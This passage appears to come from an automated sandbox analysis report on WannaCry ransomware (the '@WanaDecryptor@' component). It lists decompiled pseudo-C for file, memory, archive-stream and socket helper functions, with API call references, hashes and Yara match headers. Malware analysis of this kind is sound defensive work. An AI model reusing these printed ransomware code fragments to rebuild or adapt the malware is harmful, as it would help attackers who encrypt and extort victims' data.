                                                      0x00412306
                                                      0x00412306
                                                      0x00412313
                                                      0x00412315
                                                      0x00412319
                                                      0x0041231b
                                                      0x00412322
                                                      0x00412327
                                                      0x0041232a
                                                      0x00412336
                                                      0x00412338
                                                      0x00412343
                                                      0x00000000
                                                      0x00412345
                                                      0x0041234c
                                                      0x00000000
                                                      0x0041234c
                                                      0x00412343

                                                      APIs
                                                      • GetFileAttributesA.KERNELBASE(?,?,?), ref: 00412264
                                                      • CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 00412338
                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,?), ref: 0041234C
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesCreateDirectoryFile
                                                      • String ID:
                                                      • API String ID: 3401506121-0
                                                      • Opcode ID: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                                      • Instruction ID: eaae320e7248a4b774ebe1124a4f316430e5356865ecc18a96ed259e18cc5035
                                                      • Opcode Fuzzy Hash: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                                      • Instruction Fuzzy Hash: 6F310331204B0847C72889389D957FFBBC6ABD4320F544B3EF966C72C1DEB989588299
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00412A00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E00412A00(intOrPtr* _a4) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t14;
				intOrPtr _t16;
				void* _t18;

				_t14 = _a4;
				if(_t14 != 0) {
					if( *_t14 == 1) {
						_t2 = _t14 + 4; // 0x5d5e5f01
						_t16 =  *_t2;
						 *0x4220dc = E004127A0(_t16);
						if(_t16 != 0) {
							_t9 =  *((intOrPtr*)(_t16 + 0x138));
							if(_t9 != 0) {
								_push(_t9);
								L00412C98();
								_t18 = _t18 + 4;
							}
							_t10 =  *((intOrPtr*)(_t16 + 0x13c));
							 *((intOrPtr*)(_t16 + 0x138)) = 0;
							if(_t10 != 0) {
								_push(_t10); // executed
								L00412C98(); // executed
								_t18 = _t18 + 4;
							}
							_push(_t16);
							 *((intOrPtr*)(_t16 + 0x13c)) = 0;
							L00412C98();
							_t18 = _t18 + 4;
						}
						_push(_t14); // executed
						L00412C98(); // executed
						return  *0x4220dc;
					} else {
						 *0x4220dc = 0x80000;
						return 0x80000;
					}
				} else {
					 *0x4220dc = 0x10000;
					return 0x10000;
				}
			}








                                                      0x00412a01
                                                      0x00412a07
                                                      0x00412a18
                                                      0x00412a27
                                                      0x00412a27
                                                      0x00412a33
                                                      0x00412a38
                                                      0x00412a3a
                                                      0x00412a42
                                                      0x00412a44
                                                      0x00412a45
                                                      0x00412a4a
                                                      0x00412a4a
                                                      0x00412a4d
                                                      0x00412a53
                                                      0x00412a5f
                                                      0x00412a61
                                                      0x00412a62
                                                      0x00412a67
                                                      0x00412a67
                                                      0x00412a6a
                                                      0x00412a6b
                                                      0x00412a75
                                                      0x00412a7a
                                                      0x00412a7a
                                                      0x00412a7d
                                                      0x00412a7e
                                                      0x00412a8d
                                                      0x00412a1a
                                                      0x00412a20
                                                      0x00412a25
                                                      0x00412a25
                                                      0x00412a09
                                                      0x00412a0f
                                                      0x00412a14
                                                      0x00412a14

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8234c34db72d3a0399257c77a01998e30a4dd5d20ae4f1b0c75e851605a6604e
                                                      • Instruction ID: 94773d8abf21b8992377dbaff6472308c4204eb390e4227f2b12783aedecbb61
                                                      • Opcode Fuzzy Hash: 8234c34db72d3a0399257c77a01998e30a4dd5d20ae4f1b0c75e851605a6604e
                                                      • Instruction Fuzzy Hash: 070121B16016109BDA209F29EA417CBB3989F40354F08443BE545D7310F7F8E9E5CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040DAD0 Relevance: 6.0, APIs: 4, Instructions: 45networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: closesocketsendsetsockoptshutdown
                                                      • String ID:
                                                      • API String ID: 4063721217-0
                                                      • Opcode ID: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                                      • Instruction ID: 511c5ca045328faec3d78f5435f76df0282562355462c5d2c83a81ecee0c9610
                                                      • Opcode Fuzzy Hash: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                                      • Instruction Fuzzy Hash: 9D014075200B40ABD3208B28C849B97B7A5AF89721F808B2CF6A9962D0D7B4A4088795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004043E0 Relevance: 4.5, APIs: 3, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 50%
                                                      			E004043E0(void* __ecx) {
				void* _t3;

				_push(1);
				_push(0x100);
				_push(0);
				L00412DDC();
				_t3 = __ecx + 0x40;
				_push(_t3); // executed
				L00412DD6(); // executed
				 *((char*)(__ecx + 0x5a)) = 0;
				L00412C14();
				return _t3;
			}




                                                      0x004043e1
                                                      0x004043e3
                                                      0x004043ea
                                                      0x004043ec
                                                      0x004043f1
                                                      0x004043f6
                                                      0x004043f7
                                                      0x004043fe
                                                      0x00404402
                                                      0x00404408

                                                      APIs
                                                      • #4284.MFC42(00000000,00000100,00000001), ref: 004043EC
                                                      • #3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
                                                      • #5277.MFC42 ref: 00404402
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3874#4284#5277
                                                      • String ID:
                                                      • API String ID: 1717392697-0
                                                      • Opcode ID: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                                      • Instruction ID: 168dd717f23fd29799672b21daad70d98dc1c3a6295a550393a3fd33bd33aa1c
                                                      • Opcode Fuzzy Hash: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                                      • Instruction Fuzzy Hash: B1D012303487645AE974B266BA0BBDB5A999B45B18F04044FF2459F2C1D9D858D083E5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00411660 Relevance: 3.9, APIs: 3, Instructions: 156COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E00411660() {
				signed int _t57;
				signed int _t59;
				unsigned int _t65;
				intOrPtr _t66;
				signed int _t68;
				signed int _t71;
				signed char _t86;
				intOrPtr* _t100;
				void* _t101;
				signed int _t103;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t108;

				_t100 =  *((intOrPtr*)(_t105 + 0x18));
				if(_t100 != 0) {
					__eflags =  *(_t100 + 0x18);
					if( *(_t100 + 0x18) != 0) {
						__eflags =  *(_t100 + 0x7c);
						if(__eflags != 0) {
							E00411AC0(_t100);
							_t105 = _t105 + 4;
						}
						_t57 = E00411460(__eflags, _t100, _t105 + 0x14, _t105 + 0x18, _t105 + 0xc);
						_t106 = _t105 + 0x10;
						__eflags = _t57;
						if(_t57 == 0) {
							_t101 = malloc(0x84);
							_t107 = _t106 + 4;
							__eflags = _t101;
							if(_t101 != 0) {
								_t59 = malloc(0x4000); // executed
								 *_t101 = _t59;
								 *((intOrPtr*)(_t101 + 0x44)) =  *((intOrPtr*)(_t107 + 0x1c));
								_t108 = _t107 + 4;
								__eflags = _t59;
								 *((intOrPtr*)(_t101 + 0x48)) =  *((intOrPtr*)(_t107 + 0x10));
								 *((intOrPtr*)(_t101 + 0x4c)) = 0;
								if(_t59 != 0) {
									 *((intOrPtr*)(_t101 + 0x40)) = 0;
									__eflags =  *(_t100 + 0x34);
									 *(_t101 + 0x54) =  *(_t100 + 0x3c);
									 *((intOrPtr*)(_t101 + 0x50)) = 0;
									 *(_t101 + 0x64) =  *(_t100 + 0x34);
									 *((intOrPtr*)(_t101 + 0x60)) =  *_t100;
									__eflags =  *(_t100 + 0x34) != 0;
									 *((intOrPtr*)(_t101 + 0x68)) =  *((intOrPtr*)(_t100 + 0xc));
									 *((intOrPtr*)(_t101 + 0x18)) = 0;
									if( *(_t100 + 0x34) != 0) {
										_t25 = _t101 + 4; // 0x4
										 *((intOrPtr*)(_t101 + 0x24)) = 0;
										 *((intOrPtr*)(_t101 + 0x28)) = 0;
										 *((intOrPtr*)(_t101 + 0x2c)) = 0;
										_t71 = E00410380(_t25);
										_t108 = _t108 + 4;
										__eflags = _t71;
										if(_t71 == 0) {
											 *((intOrPtr*)(_t101 + 0x40)) = 1;
										}
									}
									 *((intOrPtr*)(_t101 + 0x58)) =  *((intOrPtr*)(_t100 + 0x40));
									 *((intOrPtr*)(_t101 + 0x5c)) =  *((intOrPtr*)(_t100 + 0x44));
									 *(_t101 + 0x6c) =  *(_t100 + 0x30) & 0x00000001;
									_t86 =  *(_t100 + 0x30) >> 3;
									__eflags = _t86 & 0x00000001;
									if((_t86 & 0x00000001) == 0) {
										_t65 =  *(_t100 + 0x3c) >> 0x18;
										__eflags = _t65;
										 *(_t101 + 0x80) = _t65;
									} else {
										 *(_t101 + 0x80) =  *(_t100 + 0x38) >> 8;
									}
									_t103 =  *(_t108 + 0x20);
									_t45 = _t101 + 0x70; // 0x70
									_t79 = _t45;
									asm("sbb ecx, ecx");
									 *_t45 = 0x12345678;
									 *((intOrPtr*)(_t101 + 0x74)) = 0x23456789;
									__eflags = _t103;
									 *(_t101 + 0x7c) =  ~( *(_t101 + 0x6c)) & 0x0000000c;
									 *((intOrPtr*)(_t101 + 0x78)) = 0x34567890;
									if(_t103 != 0) {
										while(1) {
											_t68 =  *_t103;
											__eflags = _t68;
											if(_t68 == 0) {
												goto L21;
											}
											E004100D0(_t79, _t68);
											_t108 = _t108 + 8;
											_t103 = _t103 + 1;
											__eflags = _t103;
											if(_t103 != 0) {
												continue;
											}
											goto L21;
										}
									}
									L21:
									_t66 =  *((intOrPtr*)(_t108 + 0x14));
									 *((intOrPtr*)(_t101 + 8)) = 0;
									_t53 = _t66 + 0x1e; // 0x345678ae
									__eflags = 0;
									 *((intOrPtr*)(_t101 + 0x3c)) =  *((intOrPtr*)(_t100 + 0x78)) + _t53;
									 *(_t100 + 0x7c) = _t101;
									return 0;
								} else {
									free(_t101);
									return 0xffffff98;
								}
							} else {
								return 0xffffff98;
							}
						} else {
							return 0xffffff99;
						}
					} else {
						return 0xffffff9a;
					}
				} else {
					return 0xffffff9a;
				}
			}

















                                                      0x00411666
                                                      0x0041166e
                                                      0x0041167c
                                                      0x0041167f
                                                      0x0041168d
                                                      0x00411690
                                                      0x00411693
                                                      0x00411698
                                                      0x00411698
                                                      0x004116ab
                                                      0x004116b0
                                                      0x004116b3
                                                      0x004116b5
                                                      0x004116cd
                                                      0x004116cf
                                                      0x004116d2
                                                      0x004116d4
                                                      0x004116e7
                                                      0x004116ec
                                                      0x004116f2
                                                      0x004116f9
                                                      0x004116fc
                                                      0x004116fe
                                                      0x00411701
                                                      0x00411704
                                                      0x0041171b
                                                      0x00411726
                                                      0x00411728
                                                      0x0041172b
                                                      0x00411731
                                                      0x00411739
                                                      0x0041173f
                                                      0x00411741
                                                      0x00411744
                                                      0x00411747
                                                      0x00411749
                                                      0x0041174c
                                                      0x00411750
                                                      0x00411753
                                                      0x00411756
                                                      0x0041175b
                                                      0x0041175e
                                                      0x00411760
                                                      0x00411762
                                                      0x00411762
                                                      0x00411760
                                                      0x0041176c
                                                      0x00411772
                                                      0x0041177a
                                                      0x00411780
                                                      0x00411783
                                                      0x00411786
                                                      0x00411799
                                                      0x00411799
                                                      0x0041179c
                                                      0x00411788
                                                      0x0041178e
                                                      0x0041178e
                                                      0x004117a6
                                                      0x004117aa
                                                      0x004117aa
                                                      0x004117af
                                                      0x004117b1
                                                      0x004117ba
                                                      0x004117c1
                                                      0x004117c3
                                                      0x004117c6
                                                      0x004117cd
                                                      0x004117cf
                                                      0x004117cf
                                                      0x004117d2
                                                      0x004117d4
                                                      0x00000000
                                                      0x00000000
                                                      0x004117d8
                                                      0x004117dd
                                                      0x004117e0
                                                      0x004117e0
                                                      0x004117e1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004117e1
                                                      0x004117cf
                                                      0x004117e3
                                                      0x004117e6
                                                      0x004117ea
                                                      0x004117f2
                                                      0x004117f6
                                                      0x004117f8
                                                      0x004117fb
                                                      0x00411804
                                                      0x00411706
                                                      0x00411707
                                                      0x0041171a
                                                      0x0041171a
                                                      0x004116d8
                                                      0x004116e1
                                                      0x004116e1
                                                      0x004116b9
                                                      0x004116c2
                                                      0x004116c2
                                                      0x00411683
                                                      0x0041168c
                                                      0x0041168c
                                                      0x00411672
                                                      0x0041167b
                                                      0x0041167b

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d771c3cdc0376eb06813951ce938a924a88f856aba0395dbcbb3fe4ec20f6b6d
                                                      • Instruction ID: 97d1101cb4dc6e06905e0d83e2a099da94edd87715b03694c0ad860931ce0dc9
                                                      • Opcode Fuzzy Hash: d771c3cdc0376eb06813951ce938a924a88f856aba0395dbcbb3fe4ec20f6b6d
                                                      • Instruction Fuzzy Hash: 7F51D2B5600B018FC720DF2AE880597B7E0BF84314B544A2EEA9A83751D339F499CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00410AF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00410AF0(long _a4, signed int _a8, char _a12, char _a16) {
				long _t26;
				signed int _t28;
				int _t31;
				intOrPtr* _t34;
				intOrPtr _t36;
				signed int _t37;
				signed int _t38;
				intOrPtr _t47;
				void* _t64;
				signed int _t66;

				_t1 =  &_a16; // 0x410d5a
				_t34 =  *_t1;
				_t66 = _a8;
				_t3 =  &_a12; // 0x410d5a
				_t26 = _t66 *  *_t3;
				if( *_t34 == 0) {
					_t47 =  *((intOrPtr*)(_t34 + 0x1c));
					_t36 =  *((intOrPtr*)(_t34 + 0x18));
					if(_t47 + _t26 > _t36) {
						_t26 = _t36 - _t47;
					}
					_t17 =  &_a4; // 0x410d5a
					_t37 = _t26;
					_t64 =  *((intOrPtr*)(_t34 + 0x14)) + _t47;
					_t38 = _t37 >> 2;
					memcpy( *_t17, _t64, _t38 << 2);
					_t28 = memcpy(_t64 + _t38 + _t38, _t64, _t37 & 0x00000003);
					 *((intOrPtr*)(_t34 + 0x1c)) =  *((intOrPtr*)(_t34 + 0x1c)) + _t28;
					return _t28 / _t66;
				} else {
					_t31 = ReadFile( *(_t34 + 4), _a4, _t26,  &_a4, 0); // executed
					if(_t31 == 0) {
						 *((char*)(_t34 + 8)) = 1;
					}
					return _a4 / _t66;
				}
			}













                                                      0x00410af1
                                                      0x00410af1
                                                      0x00410af6
                                                      0x00410afe
                                                      0x00410afe
                                                      0x00410b05
                                                      0x00410b31
                                                      0x00410b34
                                                      0x00410b3e
                                                      0x00410b42
                                                      0x00410b42
                                                      0x00410b47
                                                      0x00410b4b
                                                      0x00410b4d
                                                      0x00410b51
                                                      0x00410b54
                                                      0x00410b5d
                                                      0x00410b68
                                                      0x00410b6d
                                                      0x00410b07
                                                      0x00410b18
                                                      0x00410b20
                                                      0x00410b22
                                                      0x00410b22
                                                      0x00410b30
                                                      0x00410b30

                                                      APIs
                                                      • ReadFile.KERNELBASE(000000FF,00000404,ZA,00000404,00000000,00000000,0000FFFF,00410D5A,00000000,00000404,00000001,?), ref: 00410B18
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: ZA
                                                      • API String ID: 2738559852-706706751
                                                      • Opcode ID: 955d7e46bcdd16e9ef88f509da3f750024060405559589d6ed767fd5e6d7c93f
                                                      • Instruction ID: 40231aa483a0e9c283400923c975ae8b8a6f0891fd27fdec0c6452f8272ca3df
                                                      • Opcode Fuzzy Hash: 955d7e46bcdd16e9ef88f509da3f750024060405559589d6ed767fd5e6d7c93f
                                                      • Instruction Fuzzy Hash: F401CE723042008BCB18CE18D890AABB7EAABC8610B0481ADEC498B305DA75EC15C761
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004133E6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 28%
                                                      			E004133E6(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {

				_t1 =  &_a16; // 0x413236
				_push( *_t1);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				L0041343E(); // executed
				return __eax;
			}



                                                      0x004133e6
                                                      0x004133e6
                                                      0x004133ea
                                                      0x004133ee
                                                      0x004133f2
                                                      0x004133f6
                                                      0x004133fb

                                                      APIs
                                                      • #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1576
                                                      • String ID: 62A
                                                      • API String ID: 1976119259-856450375
                                                      • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                      • Instruction ID: 1789da96975510f8b15a36ac976bc3503c656fbbd280c19756f03076dd05f2b6
                                                      • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                      • Instruction Fuzzy Hash: AFB008360193D6ABCB12DE91890196ABAA2BB98305F484C1DB2A50146187668568AB16
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00410A50 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E00410A50(intOrPtr* _a4, long _a8, LONG* _a12) {
				intOrPtr* _t18;
				intOrPtr _t28;
				LONG* _t29;
				LONG* _t35;

				_t18 = _a4;
				_t28 =  *_t18;
				if(_t28 == 0) {
					L12:
					_t29 = _a12;
					if(_t29 != 0) {
						if(_t29 != 1) {
							if(_t29 == 2) {
								 *((intOrPtr*)(_t18 + 0x1c)) =  *((intOrPtr*)(_t18 + 0x18)) + _a8;
							}
							return 0;
						} else {
							 *((intOrPtr*)(_t18 + 0x1c)) =  *((intOrPtr*)(_t18 + 0x1c)) + _a8;
							return 0;
						}
					} else {
						 *((intOrPtr*)(_t18 + 0x1c)) = _a8;
						return 0;
					}
				} else {
					if( *((intOrPtr*)(_t18 + 1)) == 0) {
						if(_t28 == 0) {
							goto L12;
						} else {
							return 0x1d;
						}
					} else {
						_t35 = _a12;
						if(_t35 != 0) {
							if(_t35 != 1) {
								if(_t35 != 2) {
									return 0x13;
								} else {
									_push(_t35);
									goto L8;
								}
							} else {
								_push(_t35);
								L8:
								SetFilePointer( *(_t18 + 4), _a8, 0, ??); // executed
								return 0;
							}
						} else {
							SetFilePointer( *(_t18 + 4),  *((intOrPtr*)(_t18 + 0xc)) + _a8, _t35, _t35); // executed
							return 0;
						}
					}
				}
			}







                                                      0x00410a50
                                                      0x00410a54
                                                      0x00410a58
                                                      0x00410ab4
                                                      0x00410ab4
                                                      0x00410aba
                                                      0x00410ac9
                                                      0x00410add
                                                      0x00410ae8
                                                      0x00410ae8
                                                      0x00410aed
                                                      0x00410acb
                                                      0x00410ad4
                                                      0x00410ad9
                                                      0x00410ad9
                                                      0x00410abc
                                                      0x00410ac0
                                                      0x00410ac5
                                                      0x00410ac5
                                                      0x00410a5a
                                                      0x00410a5f
                                                      0x00410aac
                                                      0x00000000
                                                      0x00410aae
                                                      0x00410ab3
                                                      0x00410ab3
                                                      0x00410a61
                                                      0x00410a61
                                                      0x00410a67
                                                      0x00410a85
                                                      0x00410a8d
                                                      0x00410aa9
                                                      0x00410a8f
                                                      0x00410a8f
                                                      0x00000000
                                                      0x00410a8f
                                                      0x00410a87
                                                      0x00410a87
                                                      0x00410a90
                                                      0x00410a9b
                                                      0x00410aa3
                                                      0x00410aa3
                                                      0x00410a69
                                                      0x00410a79
                                                      0x00410a81
                                                      0x00410a81
                                                      0x00410a67
                                                      0x00410a5f

                                                      APIs
                                                      • SetFilePointer.KERNELBASE(?,?,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A79
                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A9B
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 4f7f19fd77e9e4b6ff3b3df98d071297d87b5023754c0952396fd1cd05ebf564
                                                      • Instruction ID: 8c7778caab8dc427a0eff36806a54932c8fce05917786e5a19e085de530b5182
                                                      • Opcode Fuzzy Hash: 4f7f19fd77e9e4b6ff3b3df98d071297d87b5023754c0952396fd1cd05ebf564
                                                      • Instruction Fuzzy Hash: 3F111C742143019FCB1CCF20C8A4ABB77A2AFE8351F15C55DF08A8B361E674D8859B48
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004109C0 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E004109C0(signed int __eax, intOrPtr _a4) {
				intOrPtr _t10;

				_t10 = _a4;
				if(_t10 != 0) {
					_t2 = _t10 + 0x10; // 0x683c247c
					if( *_t2 != 0) {
						_t3 = _t10 + 4; // 0x5b5e5fc0
						FindCloseChangeNotification( *_t3); // executed
					}
					_push(_t10);
					L00412C98();
					return 0;
				} else {
					return __eax | 0xffffffff;
				}
			}




                                                      0x004109c1
                                                      0x004109c7
                                                      0x004109ce
                                                      0x004109d3
                                                      0x004109d5
                                                      0x004109d9
                                                      0x004109d9
                                                      0x004109df
                                                      0x004109e0
                                                      0x004109eb
                                                      0x004109c9
                                                      0x004109cd
                                                      0x004109cd

                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(5B5E5FC0,?,00410F10,?), ref: 004109D9
                                                      • #825.MFC42(00410F10,?,00410F10,?), ref: 004109E0
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
